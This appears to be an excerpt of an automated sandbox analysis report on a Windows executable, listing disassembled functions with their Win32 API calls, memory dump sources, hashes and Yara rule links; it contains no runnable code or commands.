                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00436576
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 910771015-0
                                                    • Opcode ID: b479a4e126e271ca6c96964a730235dca240299a07cf073aaf4c5193d2aa0924
                                                    • Instruction ID: 186cff091270de94a1514ad628cf6de780df5dfe0c57f1ef70f0a941778e72bf
                                                    • Opcode Fuzzy Hash: b479a4e126e271ca6c96964a730235dca240299a07cf073aaf4c5193d2aa0924
                                                    • Instruction Fuzzy Hash: DE318335600119BFDB10AF14DC85BBA7BA9EB49754F02802AF9099B291DB78AD048B65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044783C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003C1D35: CreateWindowExW.USER32 ref: 003C1D73
                                                      • Part of subcall function 003C1D35: GetStockObject.GDI32(00000011), ref: 003C1D87
                                                      • Part of subcall function 003C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 003C1D91
                                                    • SendMessageW.USER32(00000000,00002001,?,FF000000), ref: 004478A1
                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 004478AE
                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004478B9
                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 004478C8
                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 004478D4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                    • String ID: Msctls_Progress32
                                                    • API String ID: 1025951953-3636473452
                                                    • Opcode ID: 2d0d69d3eb96166d3e9ff354a7caf3cc87243a24ba8649b9f907aa740931b935
                                                    • Instruction ID: 3b50bb24069ed25304cade0cbf4f629dba55926195989edb346bf6653b869ab2
                                                    • Opcode Fuzzy Hash: 2d0d69d3eb96166d3e9ff354a7caf3cc87243a24ba8649b9f907aa740931b935
                                                    • Instruction Fuzzy Hash: 151160B2550119BEFF159F60CC85EEB7F6DEF097A8F014115F608A6090C7769C22DBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00424534, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0042454E
                                                    • LoadStringW.USER32(00000000), ref: 00424555
                                                    • GetModuleHandleW.KERNEL32(00000100,00001389,?,00000100), ref: 0042456B
                                                    • LoadStringW.USER32(00000000), ref: 00424572
                                                    • MessageBoxW.USER32(00000100,?,?,00011010), ref: 004245B6
                                                    Strings
                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00424593
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message
                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                    • API String ID: 4072794657-3128320259
                                                    • Opcode ID: 4765ee8c94a4174c3473d4cd9700d7cc7422b3efafd9ec371b42ba542bd64200
                                                    • Instruction ID: 31f26d1e4c09dada72b4e5388cba7767bc920d240895f89a7ad9162f008b2042
                                                    • Opcode Fuzzy Hash: 4765ee8c94a4174c3473d4cd9700d7cc7422b3efafd9ec371b42ba542bd64200
                                                    • Instruction Fuzzy Hash: 7E014FF7500218BFE71197A0DD89EFB372CD705341F0005B6BB49E2051DA355E898B79
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003E41C9, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,003E4292,?), ref: 003E41E3
                                                    • GetProcAddress.KERNEL32(00000000), ref: 003E41EA
                                                    • EncodePointer.KERNEL32(00000000), ref: 003E41F6
                                                    • DecodePointer.KERNEL32(00000001,003E4292,?), ref: 003E4213
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                    • String ID: RoInitialize$combase.dll
                                                    • API String ID: 3489934621-340411864
                                                    • Opcode ID: e333b6d20860410e24cb255b637996892c148a5b654977bd49e1977981fc18f7
                                                    • Instruction ID: ad39b31c6658768f90246a6d5d59daa1eae3fa829012b8d81c9a5adf23c749e0
                                                    • Opcode Fuzzy Hash: e333b6d20860410e24cb255b637996892c148a5b654977bd49e1977981fc18f7
                                                    • Instruction Fuzzy Hash: 57E01AB8590341AFEB205FB1EC0DB083AA4B7A6743F504939B911E50E0DBF504998F0C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003E429E, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,003E41B8), ref: 003E42B8
                                                    • GetProcAddress.KERNEL32(00000000), ref: 003E42BF
                                                    • EncodePointer.KERNEL32(00000000), ref: 003E42CA
                                                    • DecodePointer.KERNEL32(003E41B8), ref: 003E42E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                    • String ID: RoUninitialize$combase.dll
                                                    • API String ID: 3489934621-2819208100
                                                    • Opcode ID: 43613412883e4d833b8ef4d0a15e88ea8468fd9cfe31042dbe5b016d5c792f50
                                                    • Instruction ID: 40e08054b7ba4bb122d844d470b972b43dcb890f4fd3247222eeff34cd20ed70
                                                    • Opcode Fuzzy Hash: 43613412883e4d833b8ef4d0a15e88ea8468fd9cfe31042dbe5b016d5c792f50
                                                    • Instruction Fuzzy Hash: 00E0B67C981312EBEB119F61ED0DB493AA4B76AB46F20493AF501E10A0DFB54688CB1C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00436E17, Relevance: 9.2, APIs: 6, Instructions: 250networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00436F14
                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00436F35
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00436F48
                                                    • htons.WSOCK32(?,?,00000000,?,00000000), ref: 00436FFE
                                                    • inet_ntoa.WSOCK32(?), ref: 00436FBB
                                                      • Part of subcall function 0041AE14: _strlen.LIBCMT ref: 0041AE1E
                                                    • _strlen.LIBCMT ref: 00437058
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: _strlen$ErrorLasthtonsinet_ntoa
                                                    • String ID:
                                                    • API String ID: 1050922162-0
                                                    • Opcode ID: 1966d5d074b76505495378d8ffe9a5f1ca1d1d77202e8d3d345c72bd865a55cc
                                                    • Instruction ID: 8eff7e8aab9221046e8c3b142ce5564980b50da3030003d41f8488d221b458f6
                                                    • Opcode Fuzzy Hash: 1966d5d074b76505495378d8ffe9a5f1ca1d1d77202e8d3d345c72bd865a55cc
                                                    • Instruction Fuzzy Hash: 9A810071108300ABD724EF24CC86F6BB7E9AF88714F11891EF5459B292DB74ED05CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003F99F2, Relevance: 9.2, APIs: 6, Instructions: 169memoryfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003F1B11: SetFilePointerEx.KERNEL32(00000000,00000002,?,?,00000004,00000000,?,?,?,?,003EDC91,?,00000000,00000000,00000002,?), ref: 003F1B48
                                                      • Part of subcall function 003F1B11: GetLastError.KERNEL32(?,003EDC91,?,00000000,00000000,00000002,?,?,?), ref: 003F1B52
                                                    • GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,?,00000001,00000109,?,?,003F8499,?,?,00000080), ref: 003F9A5B
                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,00000001,00000109,?,?,003F8499,?,?,00000080), ref: 003F9A62
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000109,?,?,003F8499), ref: 003F9B04
                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000001,00000109,?,?,003F8499,?), ref: 003F9B0B
                                                    • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000109,?,?,003F8499), ref: 003F9B41
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,00000109,?,?,003F8499,?), ref: 003F9B71
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Heap$ErrorFileLastProcess$AllocFreePointer
                                                    • String ID:
                                                    • API String ID: 1354853467-0
                                                    • Opcode ID: 87a4f44a7572feee8bada442ed038b08daf217530e46ac154dcf9d347eb3b135
                                                    • Instruction ID: bb9885156c7c54fc32f9a64f41434e8132a91fd9f0be10b12b86295227d17a02
                                                    • Opcode Fuzzy Hash: 87a4f44a7572feee8bada442ed038b08daf217530e46ac154dcf9d347eb3b135
                                                    • Instruction Fuzzy Hash: C741F23290051CAEDF236BB8AC4ABBE3A78EF46370F210357F629E61D0E7354D418661
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044046F, Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00440038,?,?), ref: 004410BC
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00440548
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00440588
                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 004405AB
                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 004405D4
                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 00440617
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00440624
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                    • String ID:
                                                    • API String ID: 3451389628-0
                                                    • Opcode ID: 97b7df6589294e7c172330131648d201b1ffe8ef63e96cdfaed573535aab599c
                                                    • Instruction ID: 02d9fc9d9c95f401790419e4317bb8969d2d45adc7ebbe47e0401079e472d851
                                                    • Opcode Fuzzy Hash: 97b7df6589294e7c172330131648d201b1ffe8ef63e96cdfaed573535aab599c
                                                    • Instruction Fuzzy Hash: 06518A31208200AFDB11EF24C885E6FBBE8FF89304F04492EF5468B2A1DB35E955CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00445A20, Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Menu$Item$CountMessagePostString
                                                    • String ID:
                                                    • API String ID: 650687236-0
                                                    • Opcode ID: 50c8cb853cf14b051fda6a783bf37629f0893285d6b31126b4622e181f8fdb0a
                                                    • Instruction ID: 706d93e35863bb469c5432b57814e51fe030480c93876b65c3eef3a080d07faf
                                                    • Opcode Fuzzy Hash: 50c8cb853cf14b051fda6a783bf37629f0893285d6b31126b4622e181f8fdb0a
                                                    • Instruction Fuzzy Hash: 82519135A00625EFDF11EFA5C845AAEB7B4EF48310F11446AE815BB352CB74BE41CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C1765, Relevance: 9.1, APIs: 6, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 003C179A
                                                    • GetWindowRect.USER32 ref: 003C17FE
                                                    • ScreenToClient.USER32 ref: 003C181B
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003C182C
                                                    • EndPaint.USER32(?,?), ref: 003C1876
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                    • String ID:
                                                    • API String ID: 1827037458-0
                                                    • Opcode ID: 0e45eb877d220ac8cd0278108bb3357506286849dbcd400920bbdcc583275602
                                                    • Instruction ID: aabd4e868e540c4e03b149722229cec9d5bb72e63300ff8b6bbd941b88ea7755
                                                    • Opcode Fuzzy Hash: 0e45eb877d220ac8cd0278108bb3357506286849dbcd400920bbdcc583275602
                                                    • Instruction Fuzzy Hash: 27419D71104304AFD712EF64CC84FBA7BE8EB46324F150A2DF594CA1A2C7319C45EB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044B958, Relevance: 9.1, APIs: 6, Instructions: 112windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ShowWindow.USER32(004867B0,00000000,00F784A8,?,?,004867B0,?,0044B862,?,?), ref: 0044B9CC
                                                    • EnableWindow.USER32(?,00000000), ref: 0044B9F0
                                                    • ShowWindow.USER32(004867B0,00000000,00F784A8,?,?,004867B0,?,0044B862,?,?), ref: 0044BA50
                                                    • ShowWindow.USER32(?,00000004,?,0044B862,?,?), ref: 0044BA62
                                                    • EnableWindow.USER32(?,00000001), ref: 0044BA86
                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0044BAA9
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Window$Show$Enable$MessageSend
                                                    • String ID:
                                                    • API String ID: 642888154-0
                                                    • Opcode ID: 12f191154257173d152095132ea99b2660e4365b9dbbaa2f1d8fbf681d2349e6
                                                    • Instruction ID: 4a199fdd312ffe68975fbbb2a8b8bbda4ded8520d7aac6792a54363693bfb497
                                                    • Opcode Fuzzy Hash: 12f191154257173d152095132ea99b2660e4365b9dbbaa2f1d8fbf681d2349e6
                                                    • Instruction Fuzzy Hash: AD418574600540AFEB21CF14D489B967BE0FF06315F1841BAFA489F7A2C735E849CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00427368, Relevance: 9.1, APIs: 6, Instructions: 105fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 0042737F
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 004273B6
                                                    • EnterCriticalSection.KERNEL32(?), ref: 004273D2
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0042744C
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00427461
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00427480
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                    • String ID:
                                                    • API String ID: 3368777196-0
                                                    • Opcode ID: 6775262fc5613a54faecf734c3272caaf0f5f5ec9c3d3eecf65014680c4c7415
                                                    • Instruction ID: 5eae802a59c52f886725ac41147df7906035ef74b1d8800cb6e6afbc964f986a
                                                    • Opcode Fuzzy Hash: 6775262fc5613a54faecf734c3272caaf0f5f5ec9c3d3eecf65014680c4c7415
                                                    • Instruction Fuzzy Hash: 3031FE36904115EBDF10EFA5EC85DAFBBB8FF41310B1041B6F904AA286CB719E54CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004373B1, Relevance: 9.1, APIs: 6, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00435134,?,?,00000000,00000001), ref: 004373BF
                                                      • Part of subcall function 00433C94: GetWindowRect.USER32 ref: 00433CA7
                                                    • GetDesktopWindow.USER32 ref: 004373E9
                                                    • GetWindowRect.USER32 ref: 004373F0
                                                    • mouse_event.USER32 ref: 00437422
                                                      • Part of subcall function 004254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0042555E
                                                    • GetCursorPos.USER32(?,?,?,?,?,?,00435134,?,?,00000000,00000001), ref: 0043744E
                                                    • mouse_event.USER32 ref: 004374AC
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                    • String ID:
                                                    • API String ID: 4137160315-0
                                                    • Opcode ID: 23a72e13357cc633a4fb2cbea6a907051ca6ce91108e7123ca3aadc4681eb2be
                                                    • Instruction ID: f2573878911e106df070647cf0764d2afcb413aa0fc2b450b6a8a2c98699829a
                                                    • Opcode Fuzzy Hash: 23a72e13357cc633a4fb2cbea6a907051ca6ce91108e7123ca3aadc4681eb2be
                                                    • Instruction Fuzzy Hash: 3E31E472108305AFD720DF54DC49FABBBA9FB99358F00092AF58897191C735E909CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418D5B, Relevance: 9.1, APIs: 6, Instructions: 72memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004185F1: GetTokenInformation.ADVAPI32(00000000,00000002,00000000,00000000,?,00000000,00000000,00000000,?,00418D7D,00000000,?,?,00000000,00000000), ref: 00418608
                                                      • Part of subcall function 004185F1: GetLastError.KERNEL32(?,00418D7D,00000000,?,?,00000000,00000000,?,?,?,00418977,?,?), ref: 00418612
                                                      • Part of subcall function 004185F1: GetProcessHeap.KERNEL32(00000008,?,?,00418D7D,00000000,?,?,00000000,00000000,?,?,?,00418977,?,?), ref: 00418621
                                                      • Part of subcall function 004185F1: HeapAlloc.KERNEL32(00000000,?,00418D7D,00000000,?,?,00000000,00000000,?,?,?,00418977,?,?), ref: 00418628
                                                      • Part of subcall function 004185F1: GetTokenInformation.ADVAPI32(00000000,00000002,00000000,?,?,?,00418D7D,00000000,?,?,00000000,00000000,?,?,?,00418977), ref: 0041863E
                                                    • GetLengthSid.ADVAPI32(?,00000000,00418977,?,?), ref: 00418DAC
                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00418DB8
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00418DBF
                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00418DD8
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00418977,?,?), ref: 00418DEC
                                                    • HeapFree.KERNEL32(00000000), ref: 00418DF3
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                    • String ID:
                                                    • API String ID: 3008561057-0
                                                    • Opcode ID: d6f5e030660d210e2dcbd672ae6c09d2291a29329ea4a604732d6c5b3ada07cb
                                                    • Instruction ID: d546d98bd28ea9bdafedb96811bb42b730ca6a903b3926641b8b93694214777e
                                                    • Opcode Fuzzy Hash: d6f5e030660d210e2dcbd672ae6c09d2291a29329ea4a604732d6c5b3ada07cb
                                                    • Instruction Fuzzy Hash: DF11AF76601604FFDB108FA4EC49BFF7BA9EB52355F10402EF44597250CB3A9984CB28
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418AF9, Relevance: 9.1, APIs: 6, Instructions: 69processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004,?,?,00000000,?,?,0043FCD2,?,?,?,?,?,?,?,?), ref: 00418B2A
                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,0043FCD2,?,?,?,?,?,?,?,?,?,?,?), ref: 00418B31
                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001,?,?,0043FCD2,?,?,?,?,?,?,?,?,?,?), ref: 00418B40
                                                    • CloseHandle.KERNEL32(00000004,?,?,0043FCD2,?,?,?,?,?,?,?,?,?,?,?), ref: 00418B4B
                                                    • CreateProcessWithLogonW.ADVAPI32(00000001,00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00418B7A
                                                    • DestroyEnvironmentBlock.USERENV(00000000,?,?,0043FCD2,?,?,?,?,?,?,?,?,?,?,?), ref: 00418B8E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                    • String ID:
                                                    • API String ID: 1413079979-0
                                                    • Opcode ID: 54e8d45d625151f4ae7e037361a45dbdbbce73edd6cb446bce560910fdd862e7
                                                    • Instruction ID: 5e7f0b7a4d1f9995791bd828f0eb5f03a976541550255b5e181dd38e36ba06b5
                                                    • Opcode Fuzzy Hash: 54e8d45d625151f4ae7e037361a45dbdbbce73edd6cb446bce560910fdd862e7
                                                    • Instruction Fuzzy Hash: 2F116AB6105109ABDB018F94EC49FEA7BADEB06304F044026FA00A1060C77A9D649B64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041BC53, Relevance: 9.1, APIs: 6, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 0041BC78
                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0041BC89
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041BC90
